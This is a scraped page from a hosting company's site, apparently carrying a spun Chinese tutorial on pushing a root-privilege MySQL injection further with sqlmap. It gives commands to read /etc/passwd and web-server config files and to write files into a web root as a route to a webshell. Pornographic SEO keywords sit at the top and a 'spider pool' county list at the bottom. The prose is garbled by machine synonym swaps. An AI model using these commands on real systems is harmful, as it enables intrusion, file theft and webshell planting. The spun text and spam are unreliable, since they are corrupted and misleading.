欧美一区2区三区4区公司二百,国产精品婷婷午夜在线观看,自拍偷拍亚洲精品,国产美女诱惑一区二区

歡迎來到夢飛科技

網絡技術

當前優惠活動:

sqlmap注入mysql和到root權限后怎么樣深入

 碰著一mysql root權限注入點,實驗用sqlmap進一步滲透獲取更高權限,東亞服務器 臺灣服務器,詳細如下:

判定注入點的當前用戶和當前數據庫

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db

 

root權限注入點可以實驗讀取系統文件,好比/etc/passwd,以及apache,nginx的設置文件等,相關設置文件路徑如下:

nginx: usr/local/nginx/conf/nginx.conf

 

常用的apache設置文件路徑有:

/etc/httpd/conf/httpd.conf

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

 

sqlmap讀取文件語法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"

假如magic_quotes_gpc=off就可以實驗舉辦寫入Webshell,sqlmap寫入文件語法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-write /test/test.txt --file-dest /var/www/html/1.txt

將當地的test.txt寫入到站點處事器的html目次下。

夢飛科技 - 全球數據中心基礎服務領先供應商

Copyright © 2003-2019 MFISP.COM. 國外服務器租用 IDC公司 版權所有 ? 粵ICP備11019662號

主站蜘蛛池模板: 杭州市| 肃宁县| 秭归县| 黄山市| 安国市| 伊春市| 南澳县| 长泰县| 准格尔旗| 晋州市| 怀来县| 河源市| 抚州市| 彰化县| 横峰县| 建水县| 汤原县| 巴中市| 长白| 呼玛县| 桐庐县| 屏山县| 宕昌县| 凌海市| 连云港市| 邛崃市| 黎平县| 芦山县| 临沭县| 五河县| 萍乡市| 太和县| 鸡东县| 民和| 图木舒克市| 灌南县| 讷河市| 黔南| 邓州市| 方正县| 泗水县|